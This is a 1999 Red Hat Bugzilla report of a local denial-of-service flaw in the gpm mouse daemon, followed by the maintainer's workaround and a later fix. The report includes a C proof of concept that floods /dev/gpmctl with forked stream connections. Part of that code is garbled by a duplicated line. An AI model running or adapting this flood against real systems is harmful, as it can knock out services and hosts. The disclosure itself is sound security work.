Bug 7478 - DoS in gpm
DoS in gpm
Status: CLOSED RAWHIDE
Product: Red Hat Linux
Classification: Retired
Component: gpm (Show other bugs)
6.1
i386 Linux
medium Severity medium
: ---
: ---
Assigned To: Bernhard Rosenkraenzer
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 1999-12-01 08:25 EST by cadence
Modified: 2008-05-01 11:37 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2000-01-13 17:14:56 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description cadence 1999-12-01 08:25:43 EST
Hello.

There is simmilar to sysklogd bug in gpm.
It listening on /dev/gpmctl and uses STREAM.

Any user can simply DoS the gpm and (in several circumstances) the whole
system.

Below is the sample code to DoS the gpm.
I couldn't write an exploit to ALWAYS crash the whole system, but I did it
few times. I don't know why it works and why not.
I think that You are much better programmers than I so You can do it
Yourself :)
If i will write working exploit I will NOT public it, so don't worry.


Solutions?
I don't sure if the STREAM is needed by gpm. Maybe DGRAM will be good
solution for that?
Or maybe some changes of permissions on /dev/gpmctl?

Best regards.

Tomasz Grabowski  (0-91)4333950
Akademickie Centrum Informatyki
mailto:cadence@man.szczecin.pl


-------------------------------------------------------------------------

Below is the shutup.c writen by someone else.
I made only few little changes to work with gpm.


#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>

#define PATH    "/dev/gpmctl"
#define SHUTUPS 2000
#define PROCS   100

int
main (void)
{
  int s, i;
  struct sockaddr_un sun;
  char host[128];
sockaddr_un sun;
  char host[128];

  sun.sun_family = AF_UNIX;
  strncpy (sun.sun_path, PATH, 100);
  gethostname (host, 128);

  if (fork ())
    exit (0);

  for (i = 0; i < PROCS; i++)
    if (fork () == 0)
      break;

  for (i = 0; i < SHUTUPS; i++)
    {
      if ((s = socket (AF_UNIX, SOCK_STREAM, 0)) < 0)
        {
          perror ("socket");
          while (1);
        }

      if (connect (s, (struct sockaddr *) &sun, sizeof (struct sockaddr)) <
0)
        {
          perror ("connect");
          close (s);
          i--;
        }
    }

  while (1);
}
Comment 1 Bernhard Rosenkraenzer 1999-12-01 10:20:59 EST
gpm does need STREAM. There's no easy fix for this one.
If you change permissions on /dev/gpmctl, you lose functionality.

The quickfix is to just rm /dev/gpmctl.
This will prevent things like gpm-root from working, but basic gpm functionality
is still there.

I'm looking at it to see if/how it can be fixed without losing functionality.
Comment 2 Bernhard Rosenkraenzer 2000-06-15 17:25:11 EDT
Fixed.

Note You need to log in before you can comment on or make changes to this bug.